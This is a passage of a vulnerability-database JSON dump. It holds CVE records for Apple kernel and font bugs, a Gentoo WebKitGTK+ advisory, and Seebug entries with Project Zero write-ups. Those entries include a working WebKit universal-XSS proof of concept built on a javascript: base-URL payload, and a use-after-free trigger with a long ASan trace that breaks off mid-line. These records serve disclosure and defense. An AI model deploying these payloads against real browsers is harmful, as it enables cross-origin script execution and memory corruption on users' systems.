It allows remote attackers to obtain sensitive information or cause a denial of service (out-of-bounds read and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2450", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2450"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2450", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:36", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. 
The issue involves the \"Kernel\" component. A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2483", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2483"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2483", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2022-01-17T19:05:18", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine.\n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. 
Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attack can use multiple vectors to execute arbitrary code or cause a denial of service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.3:4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "gentoo", "title": "WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2330", "CVE-2015-7096", "CVE-2015-7098", "CVE-2016-1723", "CVE-2016-1724", "CVE-2016-1725", "CVE-2016-1726", "CVE-2016-1727", "CVE-2016-1728", "CVE-2016-4692", "CVE-2016-4743", "CVE-2016-7586", "CVE-2016-7587", "CVE-2016-7589", "CVE-2016-7592", "CVE-2016-7598", "CVE-2016-7599", "CVE-2016-7610", "CVE-2016-7611", "CVE-2016-7623", "CVE-2016-7632", "CVE-2016-7635", "CVE-2016-7639", "CVE-2016-7640", "CVE-2016-7641", "CVE-2016-7642", "CVE-2016-7645", "CVE-2016-7646", "CVE-2016-7648", "CVE-2016-7649", 
"CVE-2016-7652", "CVE-2016-7654", "CVE-2016-7656", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2350", "CVE-2017-2354", "CVE-2017-2355", "CVE-2017-2356", "CVE-2017-2362", "CVE-2017-2363", "CVE-2017-2364", "CVE-2017-2365", "CVE-2017-2366", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2371", "CVE-2017-2373", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2496", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2510", "CVE-2017-2514", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2539", "CVE-2017-2544", "CVE-2017-2547", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984"], "modified": "2017-06-07T00:00:00", "id": "GLSA-201706-15", "href": "https://security.gentoo.org/glsa/201706-15", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:00:17", "description": "SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the ifnet_ordered_head linked list of interfaces.\n\nSIOCSIFORDER clears the existing list and allows userspace to specify an array of interface indexes used to build a new list.\n\nSIOCGIFORDER allow userspace to query the list of interface identifiers used to build that list.\n\nHere's the relevant code for SIOCGIFORDER:\n\n`` case SIOCGIFORDER: { /_ struct if_order _/ struct if_order _ifo = (struct if_order _)(void *)data;\n \n \n u_int32_t ordered_count = if_ordered_count; <----------------- (a)\n 
\n if (ifo->ifo_count == 0 ||\n ordered_count == 0) {\n ifo->ifo_count = ordered_count;\n } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {\n u_int32_t count_to_copy =\n MIN(ordered_count, ifo->ifo_count); <---------------- (b)\n size_t length = (count_to_copy * sizeof(u_int32_t));\n struct ifnet *ifp = NULL;\n u_int32_t cursor = 0;\n \n ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);\n if (ordered_indices == NULL) {\n error = ENOMEM;\n break;\n }\n \n ifnet_head_lock_shared();\n TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {\n if (cursor > count_to_copy) { <------------------ (c)\n break;\n }\n ordered_indices[cursor] = ifp->if_index; <------------------ (d)\n cursor++;\n }\n ifnet_head_done();\n \n\n``\n\nat (a) it reads the actual length of the list (of course it should take the lock here too, but that's not the bug I'm reporting)\n\nat (b) it computes the number of entries it wants to copy as the minimum of the requested number and the actual number of entries in the list\n\nthe loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that the write at (d) won't go out of bounds, but it should be a >=, not a >, as the cursor is the number of elements _already_ written. If count_to_copy is 0, and the cursor is 0, the write will still happen!\n\nBy requesting one fewer entries than are actually in the list the code will always write one interface index entry one off the end of the ordered_indices array.\n\nThis poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries then writes 5 entries into there.\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\nAttachment: 
[sioctl_off_by_one.c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=269350>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel memory corruption due to off-by-one in SIOCGIFORDER socket ioctl (CVE-2017-2474)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2474"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92890", "id": "SSV:92890", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:57:41", "description": "When an object element loads a JavaScript URL(e.g., javascript:alert(1)), it checks whether it violates the Same Origin Policy or not.\r\n\r\nHere's some snippets of the logic.\r\n```\r\nvoid HTMLObjectElement::updateWidget(CreatePlugins createPlugins)\r\n{\r\n ...\r\n String url = this->url(); \r\n ...\r\n if (!allowedToLoadFrameURL(url))\r\n return;\r\n ...\r\n\r\n bool beforeLoadAllowedLoad = guardedDispatchBeforeLoadEvent(url);\r\n ...\r\n\r\n bool success = beforeLoadAllowedLoad && hasValidClassId();\r\n if (success)\r\n success = requestObject(url, serviceType, paramNames, paramValues);\r\n ...\r\n}\r\n\r\nbool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)\r\n{\r\n URL completeURL = document().completeURL(url);\r\n if (contentFrame() && protocolIsJavaScript(completeURL) && !document().securityOrigin().canAccess(contentDocument()->securityOrigin()))\r\n return false;\r\n return document().frame()->isURLAllowed(completeURL);\r\n}\r\n\r\nbool HTMLPlugInElement::requestObject(const String& url, const String& mimeType, const Vector<String>& paramNames, const Vector<String>& paramValues)\r\n{\r\n if (m_pluginReplacement)\r\n return true;\r\n\r\n URL completedURL;\r\n if (!url.isEmpty())\r\n completedURL = document().completeURL(url);\r\n\r\n ReplacementPlugin* replacement = pluginReplacementForType(completedURL, mimeType);\r\n if
(!replacement || !replacement->isEnabledBySettings(document().settings()))\r\n return false;\r\n\r\n LOG(Plugins, \"%p - Found plug-in replacement for %s.\", this, completedURL.string().utf8().data());\r\n\r\n m_pluginReplacement = replacement->create(*this, paramNames, paramValues);\r\n setDisplayState(PreparingPluginReplacement);\r\n return true;\r\n}\r\n```\r\nThe SOP violation check is made in the method HTMLPlugInImageElement::allowedToLoadFrameURL.\r\n\r\nWhat I noticed is that there are two uses of |document().completeURL| for the same URL, and the method guardedDispatchBeforeLoadEvent dispatches a beforeloadevent that may execute JavaScript code after the SOP violation check. So if the base URL is changed like \"`javascript:///%0aalert(location);//`\" in the event handler, a navigation to the JavaScript URL will be made successfully.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\n### PoC:\r\n```\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet o = document.body.appendChild(document.createElement('object'));\r\no.onload = () => {\r\n o.onload = null;\r\n\r\n o.onbeforeload = () => {\r\n o.onbeforeload = null;\r\n\r\n let b = document.head.appendChild(document.createElement('base'));\r\n b.href = 'javascript:///%0aalert(location);//';\r\n };\r\n o.data = 'xxxxx';\r\n};\r\n\r\no.type = 'text/html';\r\no.data = 'https://abc.xyz/';\r\n\r\n</script>\r\n</body>\r\n</html>\r\n```", "cvss3": {}, "published": "2017-05-26T00:00:00", "type": "seebug", "title": "WebKit: UXSS through HTMLObjectElement::updateWidget(CVE-2017-2493)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2493"], "modified": "2017-05-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93150", "id": "SSV:93150", "sourceData": "\n <html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet o = document.body.appendChild(document.createElement('object'));\r\no.onload = () => {\r\n o.onload = null;\r\n\r\n o.onbeforeload = () => {\r\n o.onbeforeload = 
null;\r\n\r\n let b = document.head.appendChild(document.createElement('base'));\r\n b.href = 'javascript:///%0aalert(location);//';\r\n };\r\n o.data = 'xxxxx';\r\n};\r\n\r\no.type = 'text/html';\r\no.data = 'https://abc.xyz/';\r\n\r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93150", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T12:00:11", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nPoC:\r\n\r\n```\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction f1() {\r\n var iframe = document.getElementById(\"iframe\");\r\n iframe.srcdoc = \"x\";\r\n window.frames.event = window.event;\r\n freememory();\r\n}\r\nfunction f2() {\r\n var h = new XMLHttpRequest();\r\n h.onreadystatechange = f1;\r\n h.open(\"foo\",\"1\");\r\n var e = window.event;\r\n e.initEvent(\"1\",true,true);\r\n e.currentTarget.click();\r\n}\r\n</script>\r\n</head>\r\n<body onload=f1()>\r\n<iframe id=\"iframe\" onload=\"f2()\"></iframe>\r\n```\r\n\r\nASan log:\r\n\r\n```\r\n==25184==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a000076e80 at pc 0x000115bea4e0 bp 0x7fff52cef2e0 sp 0x7fff52cef2d8\r\nREAD of size 8 at 0x61a000076e80 thread T0\r\n #0 0x115bea4df in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df)\r\n #1 0x115bc7b72 in WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1369b72)\r\n #2 0x115bc4c06 in long long WebCore::BindingCaller<WebCore::JSEvent>::attribute<&(WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&)), 
(WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1366c06)\r\n #3 0x1121bd448 in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1587448)\r\n #4 0x111ef652e in llint_slow_path_get_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c052e)\r\n #5 0x111f13926 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12dd926)\r\n #6 0x111f17490 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1490)\r\n #7 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)\r\n #8 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)\r\n #9 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)\r\n #10 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)\r\n #11 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)\r\n #12 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)\r\n #13 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)\r\n #14 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)\r\n #15 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)\r\n #16 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)\r\n #17 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)\r\n #18 0x1150ecf83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)\r\n #19 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)\r\n #20 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)\r\n #21 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)\r\n #22 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)\r\n #23 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)\r\n #24 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)\r\n #25 0x114f4996d in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6eb96d)\r\n #26 0x11544048d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe248d)\r\n #27 0x114fddb1c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77fb1c)\r\n #28 0x114fa287e in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74487e)\r\n #29 0x114fa5a53 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x747a53)\r\n #30 0x114fa407d in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74607d)\r\n #31 
0x114fa0a92 in WebCore::DocumentLoader::handleSubstituteDataLoadNow() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x742a92)\r\n #32 0x11250aeaa in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d4eaa)\r\n #33 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)\r\n #34 0x7fff9d2f6782 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92782)\r\n #35 0x7fff9d2f62d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x922d9)\r\n #36 0x7fff9d2ed7d0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x897d0)\r\n #37 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)\r\n #38 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)\r\n #39 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)\r\n #40 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)\r\n #41 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)\r\n #42 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)\r\n #43 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)\r\n #44 
0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)\r\n #45 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)\r\n #46 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)\r\n #47 0x10cf0cb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)\r\n #48 0x7fffa08505ac in start (/usr/lib/system/libdyld.dylib+0x35ac)\r\n\r\n0x61a000076e80 is located 0 bytes inside of 1376-byte region [0x61a000076e80,0x61a0000773e0)\r\nfreed by thread T0 here:\r\n #0 0x10f50bcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)\r\n #1 0x11255181f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191b81f)\r\n #2 0x111cb4d58 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107ed58)\r\n #3 0x111cb355e in JSC::FreeList 
JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107d55e)\r\n #4 0x111cb2003 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107c003)\r\n #5 0x111cb17e6 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b7e6)\r\n #6 0x111cb143a in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b43a)\r\n #7 0x111f2b905 in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f5905)\r\n #8 0x111f26e74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) 
